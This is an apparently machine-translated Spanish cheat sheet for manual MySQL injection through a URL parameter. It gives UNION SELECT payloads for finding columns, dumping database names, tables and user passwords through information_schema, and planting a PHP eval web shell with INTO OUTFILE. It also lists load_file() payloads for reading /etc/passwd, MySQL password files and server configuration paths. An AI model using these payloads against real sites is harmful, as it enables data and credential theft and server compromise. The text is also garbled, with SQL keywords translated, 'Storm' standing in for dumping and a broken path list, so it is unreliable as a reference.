Seguridad de red, inyección de mysql, como ***.php?id=5 union select 1, 2, 3, 4.

Si vuelve normal

Ordenar por número/*

Coincidir campo

y 1=1 unión seleccione 1, 2, 3, 4, 5.... ...n/*

Posición del campo de tormenta

y 1=2 unión seleccione 1, 2, 3, 4, 5....n/*

Información de la base de datos de Storm usando funciones integradas

Version() Database() User()

No es necesario adivinar los campos disponibles para tormentar la información de la base de datos (no disponible para algunos sitios):

y 1=2 unión todos seleccionan versión() /*

y 1=2 unión todos seleccionan base de datos() /*

y 1=2 unión todos seleccionan usuario() /*

Información del sistema operativo:

y 1=2 unión todos seleccionan @@global.version_ compile_os de mysql.user /*

Permisos de base de datos:

y ord(mid(user(), 1, 1))=114 /*Regresar al valor normal de raíz

Biblioteca Storm (mysqlgt; 5.0)

Mysql 5 y superiores tienen una biblioteca incorporada information_schema, que almacena toda la información de la base de datos y la estructura de tablas de mysql

y 1=2 union select 1, 2 , 3, SCHEMA_NAME, 5, 6, 7, 8,9,10 de information_schema.SCHEMATA limit 0,1

Adivina la tabla

y 1=2 union select 1,2 ,3,TABLE_NAME,5,6,7, 8, 9, 10 de information_schema.TABLES donde TABLE_SCHEMA=Límite de base de datos (hexadecimal) 0 (inicio del registro, 0 es el primer registro inicial), 1 (mostrar 1 registro) -

Adivina el campo

y 1=2 Unión selecciona 1, 2, 3, COLUMN_NAME, 5, 6, 7, 8, 9, 10 de information_schema.COLUMNS donde TABLE_NAME= tabla límite de nombre (hexadecimal) 0, 1

contraseña de Storm

y 1=2 selección de unión 1, 2, 3, segmento de nombre de usuario, 5, 6, 7, segmento de contraseña, 8, 9 del límite de nombre de tabla 0, 1

Uso avanzado (un solo campo utilizable muestra dos contenidos de datos)

Selección de unión 1, 2, 3concat (segmento de nombre de usuario, 0x3c, segmento de contraseña ), 5, 6, 7, 8,9 del límite de nombre de tabla 0,1

Escritura directa

Caballo (privilegio de root)

Condiciones: 1. Conocer la ruta física del sitio web

2 Tener permisos suficientes (puede usar select.... de la prueba mysql.user) <. /p>

3. magic_quotes_gpc()=OFF

seleccione 'lt;?php eval($_POST[cmd])?gt;' en el archivo externo 'Ruta física'

y 1=2 unión todos seleccionan Una oración valor HEX en el archivo de salida 'Ruta'

load_file() Rutas comunes:

1. ×3c, 0×20)

2, reemplazar(load_file(char(47,101,116,99,47,112,97,115,115,119,100))

2. reemplazar(load_file(char(60), char (32))

Los dos anteriores son para ver el código exacto que se muestra en el archivo PHP. En algunos casos, no reemplazamos algunos caracteres como "lt;" se reemplazan con "espacio" para regresar. la página web sin ver el código

3. load_file(char(47)) puede enumerar el directorio raíz de los sistemas FreeBSD y Sunos.

4. conf tpd.conf o /usr/local/apche/conf tpd.conf. Ver el archivo de configuración del host virtual APACHE de Linux

5.

18. /etc/redhat-release Versión del sistema Redhat

19. C:/mysql\data\mysql\ user.MYD Contraseñas de usuario existentes en el sistema MYSQL

20, /etc/sysconfig/network-scripts/ifcfg-eth0 Ver IP.

21, /usr/local/app/php5 b /php.ini //Configuraciones relacionadas con PHP

22, /usr/local/app/apache2/conf/extra tpd-vhosts.conf //Configuración del sitio web virtual

23, C :\Program Files\RhinoSoft.com\Serv-U \ServUDaemon.ini

24.c:\windows\my.ini

25.c:\boot.ini

Archivos de configuración de sitios web de uso común

config.inc.php, config.php.

load_file() se reemplaza por (load_file(HEX).char(60), char(32))

Nota:

Char(60) significa lt;

Char(32) representa un espacio

Problemas que ocurren al inyectar manualmente:

La página muestra al inyectar:

Para la operación "UNION", hechizo (latin1_swedish_ci, IMPLICIT) y (utf8_general_ci, IMPLICIT) mezcla ilegal